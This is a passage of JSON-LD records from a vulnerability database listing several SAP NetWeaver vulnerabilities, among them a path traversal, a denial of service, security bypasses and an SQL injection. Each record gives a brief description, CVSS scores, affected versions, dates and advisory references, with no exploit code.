"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201612-0676",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "94890"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Mathieu Geli (ERPScan)",
"sources": [
{
"db": "BID",
"id": "94890"
}
],
"trust": 0.3
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver is prone to a security-bypass vulnerability.\nRemote attackers can exploit this issue to bypass certain security restrictions and gain unauthorized access to the SAP server filesystem.",
"sources": [
{
"db": "BID",
"id": "94890"
}
],
"trust": 0.3
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "94890",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "94890"
}
]
},
"id": "VAR-201612-0676",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.26917922
},
"last_update_date": "2022-05-17T01:36:34.253000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.3,
"url": "https://erpscan.com/advisories/erpscan-16-041-sap-netweaver-directory-creation-outside-jvm/"
},
{
"trust": 0.3,
"url": "http://www.sap.com"
},
{
"trust": 0.3,
"url": "https://service.sap.com/sap/support/notes/2310790"
}
],
"sources": [
{
"db": "BID",
"id": "94890"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "94890"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-12-13T00:00:00",
"db": "BID",
"id": "94890"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-12-20T01:09:00",
"db": "BID",
"id": "94890"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "94890"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Directory Creation Security Bypass Vulnerability",
"sources": [
{
"db": "BID",
"id": "94890"
}
],
"trust": 0.3
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Configuration Error",
"sources": [
{
"db": "BID",
"id": "94890"
}
],
"trust": 0.3
}
}
var-201706-1163
Vulnerability from variot
SAP NetWeaver is prone to a denial-of-service vulnerability. An attacker can exploit this issue to cause denial-of-service condition.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201706-1163",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "99026"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The vendor reported this issue.",
"sources": [
{
"db": "BID",
"id": "99026"
}
],
"trust": 0.3
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver is prone to a denial-of-service vulnerability.\nAn attacker can exploit this issue to cause denial-of-service condition.",
"sources": [
{
"db": "BID",
"id": "99026"
}
],
"trust": 0.3
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "99026",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "99026"
}
]
},
"id": "VAR-201706-1163",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.26917922
},
"last_update_date": "2022-05-17T02:02:25.893000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.3,
"url": "http://www.sap.com"
},
{
"trust": 0.3,
"url": "https://launchpad.support.sap.com/#/notes/2389181"
},
{
"trust": 0.3,
"url": "https://blogs.sap.com/2017/06/13/sap-security-patch-day-june2017/"
}
],
"sources": [
{
"db": "BID",
"id": "99026"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "99026"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-06-13T00:00:00",
"db": "BID",
"id": "99026"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-06-13T00:00:00",
"db": "BID",
"id": "99026"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "99026"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Instance Agent Service Denial of Service Vulnerability",
"sources": [
{
"db": "BID",
"id": "99026"
}
],
"trust": 0.3
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Design Error",
"sources": [
{
"db": "BID",
"id": "99026"
}
],
"trust": 0.3
}
}
var-202304-0875
Vulnerability from variot
In SAP NetWeaver (BI CONT ADDON) - versions 707, 737, 747, 757, an attacker can exploit a directory traversal flaw in a report to upload and overwrite files on the SAP server. Data cannot be read but if a remote attacker has sufficient (administrative) privileges then potentially critical OS files can be overwritten making the system unavailable. SAP of SAP NetWeaver Exists in a past traversal vulnerability.Information is tampered with and service operation is interrupted (DoS) It may be in a state
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202304-0875",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 1.8,
"vendor": "sap",
"version": "757"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.8,
"vendor": "sap",
"version": "707"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.8,
"vendor": "sap",
"version": "737"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.8,
"vendor": "sap",
"version": "747"
},
{
"model": "netweaver",
"scope": null,
"trust": 0.8,
"vendor": "sap",
"version": null
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-007128"
},
{
"db": "NVD",
"id": "CVE-2023-29186"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:707:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:737:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:747:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:757:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2023-29186"
}
]
},
"cve": "CVE-2023-29186",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 1.2,
"impactScore": 5.2,
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "cna@sap.com",
"availabilityImpact": "HIGH",
"baseScore": 8.7,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 2.3,
"impactScore": 5.8,
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 6.5,
"baseSeverity": "Medium",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2023-29186",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "High",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2023-29186",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "cna@sap.com",
"id": "CVE-2023-29186",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-202304-700",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-007128"
},
{
"db": "NVD",
"id": "CVE-2023-29186"
},
{
"db": "NVD",
"id": "CVE-2023-29186"
},
{
"db": "CNNVD",
"id": "CNNVD-202304-700"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "In SAP NetWeaver (BI CONT ADDON) - versions 707, 737, 747, 757, an attacker can exploit a directory traversal flaw in a report to\u00a0upload and overwrite files on the SAP server. Data cannot be read but if a remote attacker has sufficient (administrative) privileges then potentially critical OS files can be overwritten making the system unavailable. SAP of SAP NetWeaver Exists in a past traversal vulnerability.Information is tampered with and service operation is interrupted (DoS) It may be in a state",
"sources": [
{
"db": "NVD",
"id": "CVE-2023-29186"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-007128"
}
],
"trust": 1.62
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2023-29186",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2023-007128",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202304-700",
"trust": 0.6
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-007128"
},
{
"db": "NVD",
"id": "CVE-2023-29186"
},
{
"db": "CNNVD",
"id": "CNNVD-202304-700"
}
]
},
"id": "VAR-202304-0875",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T13:26:40.866000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP NetWeaver Repair measures for path traversal vulnerabilities",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=234159"
}
],
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202304-700"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-22",
"trust": 1.0
},
{
"problemtype": "Path traversal (CWE-22) [ others ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-007128"
},
{
"db": "NVD",
"id": "CVE-2023-29186"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
},
{
"trust": 1.6,
"url": "https://launchpad.support.sap.com/#/notes/3305907"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-29186"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/cveshow/cve-2023-29186/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-007128"
},
{
"db": "NVD",
"id": "CVE-2023-29186"
},
{
"db": "CNNVD",
"id": "CNNVD-202304-700"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "JVNDB",
"id": "JVNDB-2023-007128"
},
{
"db": "NVD",
"id": "CVE-2023-29186"
},
{
"db": "CNNVD",
"id": "CNNVD-202304-700"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-11-17T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2023-007128"
},
{
"date": "2023-04-11T04:16:08.610000",
"db": "NVD",
"id": "CVE-2023-29186"
},
{
"date": "2023-04-11T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202304-700"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-11-17T06:24:00",
"db": "JVNDB",
"id": "JVNDB-2023-007128"
},
{
"date": "2023-04-18T15:32:54.117000",
"db": "NVD",
"id": "CVE-2023-29186"
},
{
"date": "2023-04-19T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202304-700"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202304-700"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP\u00a0 of \u00a0SAP\u00a0NetWeaver\u00a0 Past traversal vulnerability in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-007128"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "path traversal",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202304-700"
}
],
"trust": 0.6
}
}
var-201703-1405
Vulnerability from variot
SAP NetWeaver is prone to a security-bypass vulnerability. Remote attackers can exploit this issue to bypass certain security restrictions and perform unauthorized actions.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201703-1405",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "96888"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The vendor reported this issue.",
"sources": [
{
"db": "BID",
"id": "96888"
}
],
"trust": 0.3
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver is prone to a security-bypass vulnerability.\nRemote attackers can exploit this issue to bypass certain security restrictions and perform unauthorized actions.",
"sources": [
{
"db": "BID",
"id": "96888"
}
],
"trust": 0.3
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "96888",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "96888"
}
]
},
"id": "VAR-201703-1405",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.26917922
},
"last_update_date": "2022-05-17T02:02:26.354000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.3,
"url": "http://www.sap.com"
},
{
"trust": 0.3,
"url": "https://service.sap.com/sap/support/notes/2372626"
},
{
"trust": 0.3,
"url": "https://blogs.sap.com/2017/03/14/sap-security-patch-day-march-2017/ "
}
],
"sources": [
{
"db": "BID",
"id": "96888"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "96888"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-03-14T00:00:00",
"db": "BID",
"id": "96888"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-03-16T01:02:00",
"db": "BID",
"id": "96888"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "96888"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Log Viewer Security Bypass Vulnerability",
"sources": [
{
"db": "BID",
"id": "96888"
}
],
"trust": 0.3
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Design Error",
"sources": [
{
"db": "BID",
"id": "96888"
}
],
"trust": 0.3
}
}
var-201704-1563
Vulnerability from variot
SQL injection vulnerability in the getUserUddiElements method in the ES UDDI component in SAP NetWeaver AS Java 7.4 allows remote authenticated users to execute arbitrary SQL commands via unspecified vectors, aka SAP Security Note 2356504. SAP NetWeaver is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. SAP NetWeaver 7.40 is vulnerable; other versions may also be affected
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
